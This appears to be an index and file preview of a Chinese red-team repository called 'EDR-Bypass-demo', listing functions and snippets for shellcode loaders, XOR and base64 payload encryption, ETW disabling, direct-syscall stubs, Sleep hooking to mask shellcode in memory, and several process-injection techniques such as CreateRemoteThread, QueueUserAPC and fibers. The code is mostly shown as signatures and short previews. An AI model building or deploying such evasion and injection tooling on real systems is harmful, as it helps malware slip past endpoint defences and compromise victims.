function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo3/demo1/demo1.cpp
function replace (line 47) | std::string replace(const std::string& inStr, const char* pSrc, const ch...
function LPVOID (line 74) | LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocG...
function EXTERN_C (line 110) | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
function BOOL (line 114) | __declspec(naked) BOOL local_is_wow64(void)
function DWORD (line 142) | DWORD SW3_HashSyscall(PCSTR FunctionName)
function PVOID (line 157) | PVOID SC_Address(PVOID NtApiAddress)
function PVOID (line 162) | PVOID SC_Address(PVOID NtApiAddress)
function BOOL (line 242) | BOOL SW3_PopulateSyscallList()
function EXTERN_C (line 334) | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
function EXTERN_C (line 350) | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
function EXTERN_C (line 366) | EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
function main (line 382) | int main()
FILE: chapter4-demo3/demo1/nt.h
type SW3_SYSCALL_ENTRY (line 42) | typedef struct _SW3_SYSCALL_ENTRY
type SW3_SYSCALL_LIST (line 49) | typedef struct _SW3_SYSCALL_LIST
type SW3_PEB_LDR_DATA (line 55) | typedef struct _SW3_PEB_LDR_DATA {
type SW3_LDR_DATA_TABLE_ENTRY (line 61) | typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
type SW3_PEB (line 68) | typedef struct _SW3_PEB {
type UNICODE_STRING (line 81) | typedef struct _UNICODE_STRING
type SYSTEM_HANDLE (line 88) | typedef struct _SYSTEM_HANDLE
type TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE (line 98) | typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE
type TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE (line 104) | typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE
type WNF_TYPE_ID (line 110) | typedef struct _WNF_TYPE_ID
type PS_CREATE_STATE (line 115) | typedef enum _PS_CREATE_STATE
type KCONTINUE_TYPE (line 127) | typedef enum _KCONTINUE_TYPE
type IO_STATUS_BLOCK (line 136) | typedef struct _IO_STATUS_BLOCK
type SYSTEM_HANDLE_INFORMATION (line 146) | typedef struct _SYSTEM_HANDLE_INFORMATION
type CLIENT_ID (line 152) | typedef struct _CLIENT_ID
type PLUGPLAY_EVENT_CATEGORY (line 158) | typedef enum _PLUGPLAY_EVENT_CATEGORY
type PNP_VETO_TYPE (line 173) | typedef enum _PNP_VETO_TYPE
type TOKEN_SECURITY_ATTRIBUTE_V1 (line 190) | typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1
type VOID (line 207) | typedef VOID(KNORMAL_ROUTINE) (
type PS_ATTRIBUTE (line 212) | typedef struct _PS_ATTRIBUTE
type WNF_STATE_NAME (line 224) | typedef struct _WNF_STATE_NAME
type KEY_VALUE_ENTRY (line 240) | typedef struct _KEY_VALUE_ENTRY
type KEY_SET_INFORMATION_CLASS (line 248) | typedef enum _KEY_SET_INFORMATION_CLASS
type SYSTEM_INFORMATION_CLASS (line 259) | typedef enum _SYSTEM_INFORMATION_CLASS
type PROCESSINFOCLASS (line 275) | typedef enum _PROCESSINFOCLASS
type MEMORY_RANGE_ENTRY (line 284) | typedef struct _MEMORY_RANGE_ENTRY
type T2_SET_PARAMETERS (line 290) | typedef struct _T2_SET_PARAMETERS_V0
type FILE_PATH (line 297) | typedef struct _FILE_PATH
type FILE_USER_QUOTA_INFORMATION (line 305) | typedef struct _FILE_USER_QUOTA_INFORMATION
type FILE_QUOTA_LIST_INFORMATION (line 316) | typedef struct _FILE_QUOTA_LIST_INFORMATION
type FILE_NETWORK_OPEN_INFORMATION (line 323) | typedef struct _FILE_NETWORK_OPEN_INFORMATION
type FILTER_BOOT_OPTION_OPERATION (line 335) | typedef enum _FILTER_BOOT_OPTION_OPERATION
type EVENT_TYPE (line 343) | typedef enum _EVENT_TYPE
type FILE_FULL_EA_INFORMATION (line 349) | typedef struct _FILE_FULL_EA_INFORMATION
type FILE_GET_EA_INFORMATION (line 358) | typedef struct _FILE_GET_EA_INFORMATION
type BOOT_OPTIONS (line 365) | typedef struct _BOOT_OPTIONS
type ULONG (line 375) | typedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;
type WNF_DATA_SCOPE (line 377) | typedef enum _WNF_DATA_SCOPE
type WNF_STATE_NAME_LIFETIME (line 386) | typedef enum _WNF_STATE_NAME_LIFETIME
type VIRTUAL_MEMORY_INFORMATION_CLASS (line 394) | typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS
type IO_SESSION_EVENT (line 401) | typedef enum _IO_SESSION_EVENT
type PORT_INFORMATION_CLASS (line 413) | typedef enum _PORT_INFORMATION_CLASS
type PLUGPLAY_CONTROL_CLASS (line 421) | typedef enum _PLUGPLAY_CONTROL_CLASS
type IO_COMPLETION_INFORMATION_CLASS (line 449) | typedef enum _IO_COMPLETION_INFORMATION_CLASS
type SECTION_INHERIT (line 454) | typedef enum _SECTION_INHERIT
type DEBUGOBJECTINFOCLASS (line 460) | typedef enum _DEBUGOBJECTINFOCLASS
type SEMAPHORE_INFORMATION_CLASS (line 466) | typedef enum _SEMAPHORE_INFORMATION_CLASS
type PS_ATTRIBUTE_LIST (line 471) | typedef struct _PS_ATTRIBUTE_LIST
type VDMSERVICECLASS (line 477) | typedef enum _VDMSERVICECLASS
type PS_CREATE_INFO (line 496) | typedef struct _PS_CREATE_INFO
type MEMORY_INFORMATION_CLASS (line 558) | typedef enum _MEMORY_INFORMATION_CLASS
type MEMORY_RESERVE_TYPE (line 573) | typedef enum _MEMORY_RESERVE_TYPE
type ALPC_PORT_INFORMATION_CLASS (line 580) | typedef enum _ALPC_PORT_INFORMATION_CLASS
type ALPC_CONTEXT_ATTR (line 595) | typedef struct _ALPC_CONTEXT_ATTR
type ALPC_DATA_VIEW_ATTR (line 604) | typedef struct _ALPC_DATA_VIEW_ATTR
type ALPC_SECURITY_ATTR (line 612) | typedef struct _ALPC_SECURITY_ATTR
type PVOID (line 621) | typedef PVOID* PPVOID;
type KPROFILE_SOURCE (line 623) | typedef enum _KPROFILE_SOURCE
type ALPC_MESSAGE_INFORMATION_CLASS (line 652) | typedef enum _ALPC_MESSAGE_INFORMATION_CLASS
type WORKERFACTORYINFOCLASS (line 658) | typedef enum _WORKERFACTORYINFOCLASS
type MEMORY_PARTITION_INFORMATION_CLASS (line 674) | typedef enum _MEMORY_PARTITION_INFORMATION_CLASS
type MUTANT_INFORMATION_CLASS (line 685) | typedef enum _MUTANT_INFORMATION_CLASS
type ATOM_INFORMATION_CLASS (line 691) | typedef enum _ATOM_INFORMATION_CLASS
type SHUTDOWN_ACTION (line 697) | typedef enum _SHUTDOWN_ACTION {
type KEY_VALUE_INFORMATION_CLASS (line 708) | typedef enum _KEY_VALUE_INFORMATION_CLASS {
type LANGID (line 717) | typedef LANGID* PLANGID;
type PLUGPLAY_EVENT_BLOCK (line 719) | typedef struct _PLUGPLAY_EVENT_BLOCK
type KNORMAL_ROUTINE (line 778) | typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
type DIRECTORY_NOTIFY_INFORMATION_CLASS (line 780) | typedef enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
type EVENT_INFORMATION_CLASS (line 786) | typedef enum _EVENT_INFORMATION_CLASS
type ALPC_MESSAGE_ATTRIBUTES (line 791) | typedef struct _ALPC_MESSAGE_ATTRIBUTES
type ALPC_PORT_ATTRIBUTES (line 797) | typedef struct _ALPC_PORT_ATTRIBUTES
type IO_SESSION_STATE (line 813) | typedef enum _IO_SESSION_STATE
type WNF_STATE_NAME (line 826) | typedef const WNF_STATE_NAME* PCWNF_STATE_NAME;
type WNF_TYPE_ID (line 828) | typedef const WNF_TYPE_ID* PCWNF_TYPE_ID;
type WNF_DELIVERY_DESCRIPTOR (line 830) | typedef struct _WNF_DELIVERY_DESCRIPTOR
type DEBUG_CONTROL_CODE (line 841) | typedef enum _DEBUG_CONTROL_CODE
type PORT_MESSAGE (line 877) | typedef struct _PORT_MESSAGE
type FILE_BASIC_INFORMATION (line 920) | typedef struct FILE_BASIC_INFORMATION
type PORT_SECTION_READ (line 929) | typedef struct _PORT_SECTION_READ
type PORT_SECTION_WRITE (line 936) | typedef struct _PORT_SECTION_WRITE
type TIMER_TYPE (line 946) | typedef enum _TIMER_TYPE
type BOOT_ENTRY (line 952) | typedef struct _BOOT_ENTRY
type EFI_DRIVER_ENTRY (line 964) | typedef struct _EFI_DRIVER_ENTRY
type USHORT (line 974) | typedef USHORT RTL_ATOM, * PRTL_ATOM;
type TIMER_SET_INFORMATION_CLASS (line 976) | typedef enum _TIMER_SET_INFORMATION_CLASS
type FSINFOCLASS (line 982) | typedef enum _FSINFOCLASS
type WAIT_TYPE (line 1001) | typedef enum _WAIT_TYPE
type USER_STACK (line 1007) | typedef struct _USER_STACK
type SECTION_INFORMATION_CLASS (line 1016) | typedef enum _SECTION_INFORMATION_CLASS
type APPHELPCACHESERVICECLASS (line 1022) | typedef enum _APPHELPCACHESERVICECLASS
type TOKEN_SECURITY_ATTRIBUTES_INFORMATION (line 1033) | typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION
type FILE_IO_COMPLETION_INFORMATION (line 1044) | typedef struct _FILE_IO_COMPLETION_INFORMATION
type PVOID (line 1051) | typedef PVOID PT2_CANCEL_PARAMETERS;
type THREADINFOCLASS (line 1053) | typedef enum _THREADINFOCLASS
type OBJECT_INFORMATION_CLASS (line 1077) | typedef enum _OBJECT_INFORMATION_CLASS
type FILE_INFORMATION_CLASS (line 1086) | typedef enum _FILE_INFORMATION_CLASS
type KEY_INFORMATION_CLASS (line 1157) | typedef enum _KEY_INFORMATION_CLASS
type OBJECT_ATTRIBUTES (line 1170) | typedef struct _OBJECT_ATTRIBUTES
type TIMER_INFORMATION_CLASS (line 1180) | typedef enum _TIMER_INFORMATION_CLASS
type KCONTINUE_ARGUMENT (line 1185) | typedef struct _KCONTINUE_ARGUMENT
FILE: chapter4-demo4/ShellcodeFluctuation/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo4/ShellcodeFluctuation/base64.h
function XOR_KEY (line 6) | const int XOR_KEY{ 8 }
FILE: chapter4-demo4/ShellcodeFluctuation/header.h
type std (line 19) | typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::C...
type TypeOfFluctuation (line 21) | enum TypeOfFluctuation
type FluctuationMetadata (line 28) | struct FluctuationMetadata
type HookedSleep (line 37) | struct HookedSleep
type HookTrampolineBuffers (line 43) | struct HookTrampolineBuffers
FILE: chapter4-demo4/ShellcodeFluctuation/main.cpp
function MySleep (line 12) | void WINAPI MySleep(DWORD dwMilliseconds)
function collectMemoryMap (line 68) | std::vector<MEMORY_BASIC_INFORMATION> collectMemoryMap(HANDLE hProcess, ...
function initializeShellcodeFluctuation (line 95) | void initializeShellcodeFluctuation(const LPVOID caller)
function xor32 (line 141) | void xor32(uint8_t* buf, size_t bufSize, uint32_t xorKey)
function isShellcodeThread (line 157) | bool isShellcodeThread(LPVOID address)
function fastTrampoline (line 179) | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAd...
function hookSleep (line 265) | bool hookSleep()
function shellcodeEncryptDecrypt (line 279) | void shellcodeEncryptDecrypt(LPVOID callerAddress)
function LONG (line 345) | LONG NTAPI VEHHandler(PEXCEPTION_POINTERS pExceptInfo)
function readShellcode (line 386) | bool readShellcode(const char* path, std::vector<uint8_t>& shellcode)
function runShellcode (line 410) | void runShellcode(LPVOID param)
function injectShellcode (line 422) | bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread)
function replace (line 484) | std::string replace(const std::string& inStr, const char* pSrc, const ch...
function main (line 511) | int main(int argc, char** argv)
FILE: demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.cpp
function disableETW (line 11) | void disableETW(void) {
function main (line 46) | int main()
FILE: demo2/shellcode_execut3/shellcode_execut3/Program.cs
class Program (line 17) | static class Program
method SubArray (line 19) | private static T[] SubArray<T>(this T[] data, int index, int length)
method xor (line 26) | private static byte[] xor(byte[] cipher, byte[] key)
method Main (line 39) | static void Main()
method VirtualAlloc (line 95) | [DllImport("kernel32")]
method CreateThread (line 103) | [DllImport("kernel32")]
method WaitForSingleObject (line 113) | [DllImport("kernel32")]
FILE: demo3/SharpInjector-master/ScEncryptor/Program.cs
class Program (line 12) | class Program
method Main (line 14) | static void Main(string[] args)
method Enc (line 31) | public static string Enc(string data)
method WriteShellcodeToFile (line 70) | public static void WriteShellcodeToFile(string EncryptedShellcode)
FILE: demo3/SharpInjector-master/SharpInjector/CreateFiber.cs
class CreateFiber (line 14) | class CreateFiber
method ExecuteCreateFiber (line 16) | public static void ExecuteCreateFiber(byte[] Shellcode)
FILE: demo3/SharpInjector-master/SharpInjector/CreateRemoteThread.cs
class CreateRemoteThread (line 12) | class CreateRemoteThread
method ExecuteCreateRemoteThread (line 14) | public static void ExecuteCreateRemoteThread(string ParentName, string...
FILE: demo3/SharpInjector-master/SharpInjector/CreateRemoteThreadEx.cs
class CreateRemoteThreadEx (line 12) | class CreateRemoteThreadEx
method ExecuteCreateRemoteThreadEx (line 14) | public static void ExecuteCreateRemoteThreadEx(string ParentName, stri...
FILE: demo3/SharpInjector-master/SharpInjector/CreateThread.cs
class CreateThread (line 10) | class CreateThread
method ExecuteCreateThread (line 12) | public static void ExecuteCreateThread(byte[] Shellcode)
FILE: demo3/SharpInjector-master/SharpInjector/EtwpCreateEtwThread.cs
class EtwpCreateEtwThread (line 14) | class EtwpCreateEtwThread
method ExecuteEtwpCreateEtwThread (line 18) | public static void ExecuteEtwpCreateEtwThread(byte[] Shellcode)
FILE: demo3/SharpInjector-master/SharpInjector/Program.cs
class Program (line 17) | class Program
method xor (line 19) | private static byte[] xor(byte[] cipher, byte[] key)
method Main (line 30) | static void Main(string[] args)
method VirtualAlloc (line 81) | [DllImport("kernel32")]
method CreateThread (line 89) | [DllImport("kernel32")]
method WaitForSingleObject (line 99) | [DllImport("kernel32")]
method Dec (line 106) | public static string Dec(string ciphertext)
type ExecutionMethod (line 134) | public enum ExecutionMethod
FILE: demo3/SharpInjector-master/SharpInjector/Properties/Resource1.Designer.cs
class Resource1 (line 22) | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resource...
method Resource1 (line 31) | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Mic...
FILE: demo3/SharpInjector-master/SharpInjector/QueueUserAPC.cs
class QueueUserAPC (line 12) | class QueueUserAPC
method ExecuteQueueUserAPC (line 14) | public static void ExecuteQueueUserAPC(string ParentName, string Progr...
FILE: demo3/SharpInjector-master/SharpInjector/RtlCreateUserThread.cs
class RtlCreateUserThread (line 13) | class RtlCreateUserThread
method ExecuteRtlCreateUserThread (line 15) | public static void ExecuteRtlCreateUserThread(string ParentName, strin...
FILE: demo3/SharpInjector-master/SharpInjector/Shellycode.cs
class EncryptedShellcode (line 3) | class EncryptedShellcode
FILE: demo3/SharpInjector-master/SharpInjector/WinAPI.cs
class WinAPI (line 10) | class WinAPI
type PROCESS_INFORMATION (line 19) | public struct PROCESS_INFORMATION
type SECURITY_ATTRIBUTES (line 27) | public struct SECURITY_ATTRIBUTES
type STARTUPINFO (line 35) | public struct STARTUPINFO
type STARTUPINFOEX (line 57) | public struct STARTUPINFOEX
type StartupInfoFlags (line 63) | public enum StartupInfoFlags : uint
type ProcessCreationFlags (line 69) | public enum ProcessCreationFlags : uint
type ProcessAccessFlags (line 76) | public enum ProcessAccessFlags : uint
type FreeType (line 82) | public enum FreeType : uint
type ThreadAccess (line 88) | public enum ThreadAccess : int
method CloseHandle (line 93) | [DllImport("kernel32.dll")]
method ConvertThreadToFiber (line 98) | [DllImport("kernel32.dll")]
method CreateFiber (line 102) | [DllImport("kernel32.dll")]
method CreateProcess (line 108) | [DllImport("kernel32.dll")]
method CreateThread (line 121) | [DllImport("kernel32.dll")]
method CreateRemoteThread (line 130) | [DllImport("kernel32.dll")]
method CreateRemoteThreadEx (line 140) | [DllImport("kernel32.dll")]
method EtwpCreateEtwThread (line 151) | [DllImport("ntdll.dll")]
method InitializeProcThreadAttributeList (line 156) | [DllImport("kernel32.dll")]
method OpenProcess (line 163) | [DllImport("kernel32.dll")]
method OpenThread (line 169) | [DllImport("kernel32.dll")]
method QueueUserAPC (line 175) | [DllImport("kernel32.dll")]
method ResumeThread (line 182) | [DllImport("kernel32.dll")]
method RtlCopyMemory (line 186) | [DllImport("kernel32.dll", EntryPoint = "RtlMoveMemory")]
method RtlCreateUserThread (line 192) | [DllImport("ntdll.dll")]
method SwitchToFiber (line 206) | [DllImport("kernel32.dll")]
method TerminateProcess (line 210) | [DllImport("kernel32.dll")]
method UpdateProcThreadAttribute (line 215) | [DllImport("kernel32.dll")]
method VirtualAlloc (line 225) | [DllImport("kernel32.dll")]
method VirtualAllocEx (line 232) | [DllImport("kernel32.dll")]
method VirtualFree (line 240) | [DllImport("kernel32.dll")]
method VirtualFreeEx (line 246) | [DllImport("kernel32.dll")]
method VirtualProtect (line 253) | [DllImport("kernel32.dll")]
method VirtualProtectEx (line 260) | [DllImport("kernel32.dll")]
method WaitForSingleObject (line 268) | [DllImport("kernel32.dll")]
method WriteProcessMemory (line 273) | [DllImport("kernel32.dll")]
method Clean (line 281) | public static void Clean(IntPtr hprocess, IntPtr address, int length)
FILE: demo4/syscall/syscall/syscall_call.cpp
function main (line 18) | int main()
FILE: demo5/syscall3/syscall3/1.cpp
function EXTERN_C (line 10) | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
function BOOL (line 14) | __declspec(naked) BOOL local_is_wow64(void)
function DWORD (line 42) | DWORD SW3_HashSyscall(PCSTR FunctionName)
function PVOID (line 57) | PVOID SC_Address(PVOID NtApiAddress)
function PVOID (line 62) | PVOID SC_Address(PVOID NtApiAddress)
function BOOL (line 142) | BOOL SW3_PopulateSyscallList()
function EXTERN_C (line 234) | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
function EXTERN_C (line 250) | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
function EXTERN_C (line 266) | EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
FILE: demo5/syscall3/syscall3/1.h
type SW3_SYSCALL_ENTRY (line 20) | typedef struct _SW3_SYSCALL_ENTRY
type SW3_SYSCALL_LIST (line 27) | typedef struct _SW3_SYSCALL_LIST
type SW3_PEB_LDR_DATA (line 33) | typedef struct _SW3_PEB_LDR_DATA {
type SW3_LDR_DATA_TABLE_ENTRY (line 39) | typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
type SW3_PEB (line 46) | typedef struct _SW3_PEB {
type SYSTEM_HANDLE (line 59) | typedef struct _SYSTEM_HANDLE
type IO_STATUS_BLOCK (line 69) | typedef struct _IO_STATUS_BLOCK
type SYSTEM_HANDLE_INFORMATION (line 79) | typedef struct _SYSTEM_HANDLE_INFORMATION
type VOID (line 85) | typedef VOID(KNORMAL_ROUTINE) (
type PS_ATTRIBUTE (line 90) | typedef struct _PS_ATTRIBUTE
type UNICODE_STRING (line 102) | typedef struct _UNICODE_STRING
type OBJECT_ATTRIBUTES (line 120) | typedef struct _OBJECT_ATTRIBUTES
type CLIENT_ID (line 130) | typedef struct _CLIENT_ID
type SYSTEM_INFORMATION_CLASS (line 136) | typedef enum _SYSTEM_INFORMATION_CLASS
type PROCESSINFOCLASS (line 152) | typedef enum _PROCESSINFOCLASS
type WAIT_TYPE (line 161) | typedef enum _WAIT_TYPE
type KNORMAL_ROUTINE (line 172) | typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
type THREADINFOCLASS (line 174) | typedef enum _THREADINFOCLASS
type SECTION_INHERIT (line 198) | typedef enum _SECTION_INHERIT
type FILE_INFORMATION_CLASS (line 204) | typedef enum _FILE_INFORMATION_CLASS
type PS_ATTRIBUTE_LIST (line 275) | typedef struct _PS_ATTRIBUTE_LIST
FILE: demo5/syscall3/syscall3/syscall3.cpp
function main (line 4) | int main()
FILE: demo6/unhook_demo/Header.h
type std (line 18) | typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::C...
type HookedSleep (line 20) | struct HookedSleep
type HookTrampolineBuffers (line 26) | struct HookTrampolineBuffers
FILE: demo6/unhook_demo/unhook_demo.cpp
function MySleep (line 12) | void WINAPI MySleep(DWORD dwMilliseconds)
function fastTrampoline (line 23) | bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAd...
function hookSleep (line 111) | bool hookSleep()
function main (line 125) | int main()
Condensed preview — 280 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (529K chars).
[
{
"path": "README.md",
"chars": 950,
"preview": "# EDR-Bypass-demo\nSome demos to bypass EDRs or AVs by 78itsT3@m\n\n## 本文为7bits系列文章《红队队开发基础-基础免杀》的示例代码\n\n### 欢迎关注我们的公众号 - Zb"
},
{
"path": "chapter4-demo1/demo1/Debug/demo1.log",
"chars": 63,
"preview": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo1/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 193,
"preview": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:Win"
},
{
"path": "chapter4-demo1/demo1/Header.h",
"chars": 39,
"preview": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };"
},
{
"path": "chapter4-demo1/demo1/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo1/demo1/base64.h",
"chars": 1161,
"preview": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10"
},
{
"path": "chapter4-demo1/demo1/demo1.cpp",
"chars": 4147,
"preview": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostrea"
},
{
"path": "chapter4-demo1/demo1/demo1.vcxproj",
"chars": 7736,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo1/demo1/demo1.vcxproj.filters",
"chars": 1297,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo1/demo1/demo1.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "chapter4-demo1/demo1/x64/Debug/demo1.exe.recipe",
"chars": 289,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>C:\\Users\\Ad"
},
{
"path": "chapter4-demo1/demo1/x64/Debug/demo1.log",
"chars": 398,
"preview": " base64.cpp\r\n demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”"
},
{
"path": "chapter4-demo1/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 158,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo1/demo1/x64/Release/demo1.exe.recipe",
"chars": 291,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>C:\\Users\\Ad"
},
{
"path": "chapter4-demo1/demo1/x64/Release/demo1.log",
"chars": 568,
"preview": " base64.cpp\r\n demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”"
},
{
"path": "chapter4-demo1/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
"chars": 160,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo1/demo1.sln",
"chars": 1433,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "chapter4-demo1/enc.py",
"chars": 199,
"preview": "import base64\r\nwith open(\"1.txt\",\"rb\") as f:\r\n all=f.read()\r\n array=[]\r\n for i in all:\r\n array.append(i^"
},
{
"path": "chapter4-demo2/demo1/Debug/demo1.log",
"chars": 63,
"preview": " demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo2/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 193,
"preview": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:Win"
},
{
"path": "chapter4-demo2/demo1/Header.h",
"chars": 734,
"preview": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };\r\n#include <vector>\r\n\r\nconst std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000"
},
{
"path": "chapter4-demo2/demo1/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo2/demo1/base64.h",
"chars": 1161,
"preview": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10"
},
{
"path": "chapter4-demo2/demo1/demo1.cpp",
"chars": 7584,
"preview": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostrea"
},
{
"path": "chapter4-demo2/demo1/demo1.vcxproj",
"chars": 7998,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo2/demo1/demo1.vcxproj.filters",
"chars": 1509,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo2/demo1/demo1.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "chapter4-demo2/demo1/nt.asm",
"chars": 474,
"preview": ".code\r\n\r\n\r\nbye :\r\nret\r\n\r\nBNtAVM proc\r\nmov r8, r10\r\nmov r10, 01h\r\nxor r10, r10\r\nmov r10, 0Ah\r\nmov r10, rcx\r\nxor eax, eax\r"
},
{
"path": "chapter4-demo2/demo1/nt.h",
"chars": 549,
"preview": "#pragma once\r\n#include <Windows.h>\r\n\r\n#define STATUS_SUCCESS 0\r\n\r\nEXTERN_C NTSTATUS BNtAVM(\r\n\tHANDLE ProcessHandle,\r\n\tPV"
},
{
"path": "chapter4-demo2/demo1/x64/Debug/demo1.exe.recipe",
"chars": 274,
